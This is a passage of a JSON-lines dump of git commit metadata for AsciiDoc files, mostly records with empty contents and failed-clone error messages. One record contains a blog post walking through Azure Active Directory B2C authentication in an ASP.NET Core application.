Metrics 0.12.0 - Release\n","repos":"hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/02\/02\/hawkular-metrics-0.12.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/02\/02\/hawkular-metrics-0.12.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f35fede0974b260b5c9ab62292f35c36d956012c","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35d9e8fa210b96fbdbf79f795800e67927ab55dd","subject":"y2b create post Ninja Gaiden 3 Collector's Edition Unboxing","message":"y2b create post Ninja Gaiden 3 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-06-Ninja-Gaiden-3-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2012-04-06-Ninja-Gaiden-3-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"908c3cf934d22ee4b64dac8cfca8ae6ccac22a84","subject":"Update 2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","message":"Update 2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","new_file":"_posts\/2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc962911d563510976073332d6d18e7044195e5e","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1778f6967662d9126607354ca24b400e6895b19b","subject":"CAMEL-13435 - Docs","message":"CAMEL-13435 - Docs\n","repos":"pmoerenhout\/camel,ullgren\/camel,DariusX\/camel,nikhilvibhav\/camel,apache\/camel,DariusX\/camel,CodeSmell\/camel,nikhilvibhav\/camel,ullgren\/camel,tdiesler\/camel,objectiser\/camel,pmoerenhout\/camel,cunningt\/camel,objectiser\/camel,alvinkwekel\/camel,cunningt\/camel,CodeSmell\/camel,christophd\/camel,cunningt\/camel,CodeSmell\/camel,cunningt\/camel,mcollovati\/camel,DariusX\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,nicolaferraro\/camel,zregvart\/camel,alvinkwekel\/camel,christophd\/camel,adessaigne\/camel,nikhilvibhav\/camel,objectiser\/camel,adessaigne\/camel,alvinkwekel\/camel,apache\/camel,zregvart\/camel,gnodet\/camel,nicolaferraro\/camel,apache\/camel,zregvart\/camel,tadayosi\/camel,tdiesler\/camel,apache\/camel,pmoerenhout\/camel,christophd\/camel,mcollovati\/camel,gnodet\/camel,pmoerenhout\/camel,CodeSmell\/camel,alvinkwekel\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,zregvart\/camel,nicolaferraro\/camel,apache\/camel,tadayosi\/camel,ullgren\/camel,ullgren\/camel,mcollovati\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,adessaigne\/camel,pax95\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,pax95\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,pax95\/camel,gnodet\/camel,pax95\/camel,gnodet\/camel,christophd\/camel","old_file":"components\/camel-aws-translate\/src\/main\/docs\/aws-translate-component.adoc","new_file":"components\/camel-aws-translate\/src\/main\/docs\/aws-translate-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f32594c1f2ccd16f0c6e9f29fc5dfc648123d02f","subject":"create post Is The LG V30 The Most Underrated Smartphone?","message":"create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Is-The-LG-V30-The-Most-Underrated-Smartphone?.adoc","new_file":"_posts\/2018-02-26-Is-The-LG-V30-The-Most-Underrated-Smartphone?.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ac37fec15d88d9611e4cbb616a3cb42b2596c4","subject":"v2.26 release notes","message":"v2.26 release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af05199a03a3fba2eea4263b83bd7c31e59b3ac7","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"jarryDk\/MineCraft,jarryDk\/MineCraft","old_file":"android-minecraft\/README.adoc","new_file":"android-minecraft\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarryDk\/MineCraft.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1d6b92763d150a45f35ae9633a659cf1ddf8002","subject":"Update 2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","message":"Update 2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","new_file":"_posts\/2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","new_contents":"= Implementing Authentication in an ASP.NET Core application using Azure Active Directory\n:hp-tags: asp.net\n:hp-alt-title: Implementing Authentication in an ASP.NET Core application using Azure Active Directory\n:published_at: 2017-05-31\n\nImplementing Authentication in an ASP.NET Core application using Azure Active Directory.\n\nIn an on premise world, there are different ways of implementing Authentication and here are some of the scenarios\n\n\u2022\tIn an Windows world typically you host your site on a WebServer like IIS and you enable Windows Authentication schemes like Kerberos or NTLM for an in house applications (intranet sites). The Windows Subsystem (LSAS) talks to the on premise Active Directory (Domain Controllers) to implement these Authentication Protocols.\n\u2022\tThe above mechanism requires users to be present in the Active Directory but if you need to sign in with your own custom users then the other approach is to use asp.net membership provider which provides facility to create new users and store them in Database like SQL. So, now any non-domain user can use the site and services.\n\n\nImagine you access ten different public sites and you have ten different usernames and passwords to remember. It\u2019s a tedious Job to remember all different usernames and passwords. If you happen to use same password across all sites and if the password gets hacked then you are in trouble!\n\nToday Social Login is a buzzword which is completely different than our traditional authentication process. This approach integrates applications with third party providers like Facebook ,Twitter ,Google to provide the Single Sign on Experience.\n\nThe Azure Active Directory [AAD] provides different Services and one of them is the Identity Management. The AAD provides both options of authenticating an user against domain user and also can help you to easily integrate your application with social login providers (facebook,gmail etc)\n\nTo begin with, you need to create an Azure Active Directory B2C ( Business to Consumer) Connect which is basically the Cloud Service which implements OpenID Connect authentication protocol on top of OAuth 2.0. In this Example we will use Visual Studio 2017 to quickly create an asp.net core application and enable Azure Active Directory Based Authentication\n\nStep 1 :\nCreate the Active Directory b2c Connect using the steps outlined here https:\/\/docs.microsoft.com\/en-us\/azure\/active-directory-b2c\/active-directory-b2c-get-started \n\nStep2:\n\nCreate an asp.net core project targeting .net Framework \n\n \nimage::auth1.png[]\n\n\nNow, Select Web Application and Click on Change Authentication\n\nimage::auth2.png[]\n\n\nNow, Select Work or School Accounts. (Make sure you are using the same account used for azure portal to login to Visual Studio). You will see the b2c tenant listed here (in the Domain Text box) that you created in the step1. Now press OK\n\nimage::auth3.png[]\n \n\n\n\nHere are some of the things that happens to your MVC project behind the scenes\n\n1.\tIt adds references to Couple of Nuget Packages \u201cMicrosoft.AspnetCore.Authentication.Cookies\u201d and \u201cMicrosoft.AspnetCore.Authentication.OpenIdConnect\u201d \n2.\tThe ConfigureServices and Configure method inside Startup.cs are updated to inject the Middleware to perform openId Authentication\n\nimage::auth4.png[]\n\nimage::auth5.png[]\n \n\n3.\tThe above method reads some of the settings like ClientID, TenantId which are also updated in the appsettings.Json file\n\nimage::auth6.png[]\n \n\n4.\tThe ClientID is the unique ID generated for each of the application that you register under that tenant. You can also manually create the ClientID by going to the azure portal and selecting the application settings for that tenant.\n5.\tThe HomeController is decorated with Authorize attribute that will force the user to perform Authentication\n \nimage::auth7.png[]\n\nNow to test the authentication you should create an user on the azure portal for that specific tenant that you created. Here is the snapshot of that flow\n\nimage::auth8.png[] \n\n\nNow go ahead and launch the default site of your site and it should take you to the login page on which you can enter the newly created user and password. Once the user is authenticated you should see the Home\/Index page loading with the username listed.\n\n","old_contents":"","returncode":1,"stderr":"error: pathspec '_posts\/2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc' did not match any file(s) known to git\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8444cf4ebd1fadd5f706c64e0c108707c0cb60","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8611c882f59ce3a8cbfa5efabe913dcd147b540","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84cbb3e60e12c413eb20d48b5508f70013f9b637","subject":"Update Quick Start Guide_RestcommONE Cloud.adoc","message":"Update Quick Start Guide_RestcommONE Cloud.adoc","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"cffcb1f15222647cccef4495679ef0c1d09e59c1","subject":"Update 2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","message":"Update 2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","new_file":"_posts\/2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da647154fabad3de12e60c43bcd9fc6463cf737f","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca363cdfc1a19d3793467d000e72afb66bf0f53","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dae52be66291b74a654faad4c5e265833761494b","subject":"doc: add cookbook link","message":"doc: add cookbook link\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_index.asciidoc","new_file":"doc\/trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ec173f7bda03f9bd09d3945b3e2fbb4f43b83c4","subject":"Tweak SLES 12 source install instructions","message":"Tweak SLES 12 source install instructions\n\nChange-Id: Idda4bc0ade6ce8579a3d8acccdd450be2f07030f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2225\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ebfed46abf066dfc9003c1a93f19a984151b0162","subject":"Update 2015-09-25-Blog-simplified.adoc","message":"Update 2015-09-25-Blog-simplified.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52abf425d0d9d6c14d11e24ad03b9c7be59115ca","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8feda1c991e539744897ded59f49f7fae6cd7ccc","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eea036b0eb2051f55e10f527853f1e62b542566a","subject":"Update 2015-05-21-My-title.adoc","message":"Update 2015-05-21-My-title.adoc","repos":"harquail\/harquail.github.io,harquail\/harquail.github.io,harquail\/harquail.github.io","old_file":"_posts\/2015-05-21-My-title.adoc","new_file":"_posts\/2015-05-21-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harquail\/harquail.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fd896bad5e1a91769766142ad0522762b81fa51","subject":"Add a guide on webpack","message":"Add a guide on webpack\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/webpack.adoc","new_file":"content\/guides\/webpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0cf0003c8391e0b4b543fddb74d36173fa13fff8","subject":"y2b create post X1: The Future of TV? [ad]","message":"y2b create post X1: The Future of TV? [ad]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-14-X1-The-Future-of-TV-ad.adoc","new_file":"_posts\/2015-12-14-X1-The-Future-of-TV-ad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab2cf39f344bd7a6d40fb93a08217177c56b71d2","subject":"Update 2017-07-27-Javascript-Save-Dialog.adoc","message":"Update 2017-07-27-Javascript-Save-Dialog.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-27-Javascript-Save-Dialog.adoc","new_file":"_posts\/2017-07-27-Javascript-Save-Dialog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e64580b430133b3c8fe1e2bb61d4d80bb9ad3de","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"711cf1684827d9edfbe8cfbfa74ceb6606cb3bed","subject":"Update 2018-01-27-eGPU-Glory-has-Arrived.adoc","message":"Update 2018-01-27-eGPU-Glory-has-Arrived.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2018-01-27-eGPU-Glory-has-Arrived.adoc","new_file":"_posts\/2018-01-27-eGPU-Glory-has-Arrived.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98ea64d6a27e0b13f4151ad7d07f67583c27f815","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/reduction.adoc","new_file":"content\/writings\/reduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"55b4d38dadbb3f678182e03e2726a709d9149db9","subject":"Added use-case description Olafia medication list","message":"Added use-case description Olafia medication list\n","repos":"DIPSASA\/dips-ckm,bjornna\/dips-ckm","old_file":"doc\/olafia\/olafia_usecase.adoc","new_file":"doc\/olafia\/olafia_usecase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49106b127a7e70eea4038ecdd19969aaddbc2ca5","subject":"Update 2016-11-05-Saturday.adoc","message":"Update 2016-11-05-Saturday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday.adoc","new_file":"_posts\/2016-11-05-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6c41aed897e4c906437856e4f65836b813959a5","subject":"Update NOTES","message":"Update NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70ba909b8c469d6b0abc4c7766e5ee0b3b067c43","subject":"Update 2016-05-22-Hubpress-Test.adoc","message":"Update 2016-05-22-Hubpress-Test.adoc","repos":"noahrc\/noahrc.github.io,noahrc\/noahrc.github.io,noahrc\/noahrc.github.io,noahrc\/noahrc.github.io","old_file":"_posts\/2016-05-22-Hubpress-Test.adoc","new_file":"_posts\/2016-05-22-Hubpress-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noahrc\/noahrc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab1a13a1a7817dec71cd18c7c768b1390f220ebf","subject":"Update 2016-03-16-Episode-50-Is-Virtual-Reality-the-Pinnacle-of-Pinball.adoc","message":"Update 2016-03-16-Episode-50-Is-Virtual-Reality-the-Pinnacle-of-Pinball.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-03-16-Episode-50-Is-Virtual-Reality-the-Pinnacle-of-Pinball.adoc","new_file":"_posts\/2016-03-16-Episode-50-Is-Virtual-Reality-the-Pinnacle-of-Pinball.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f76f49003b08bd23bd97f328156f35048573656","subject":"Update compound-word-tokenfilter.asciidoc","message":"Update compound-word-tokenfilter.asciidoc\n\nImproved the docs for compound work token filter.\r\n\r\nCloses #13670\r\nCloses #13595","repos":"nrkkalyan\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,polyfractal\/elasticsearch,jchampion\/elasticsearch,masterweb121\/elasticsearch,karthikjaps\/elasticsearch,myelin\/elasticsearch,obourgain\/elasticsearch,PhaedrusTheGreek\/elasticsearch,bawse\/elasticsearch,diendt\/elasticsearch,qwerty4030\/elasticsearch,rhoml\/elasticsearch,F0lha\/elasticsearch,socialrank\/elasticsearch,petabytedata\/elasticsearch,nrkkalyan\/elasticsearch,ESamir\/elasticsearch,wbowling\/elasticsearch,shreejay\/elasticsearch,MetSystem\/elasticsearch,Rygbee\/elasticsearch,xingguang2013\/elasticsearch,mbrukman\/elasticsearch,mortonsykes\/elasticsearch,mmaracic\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,mjason3\/elasticsearch,Rygbee\/elasticsearch,polyfractal\/elasticsearch,mgalushka\/elasticsearch,davidvgalbraith\/elasticsearch,tebriel\/elasticsearch,myelin\/elasticsearch,jchampion\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,nellicus\/elasticsearch,davidvgalbraith\/elasticsearch,areek\/elasti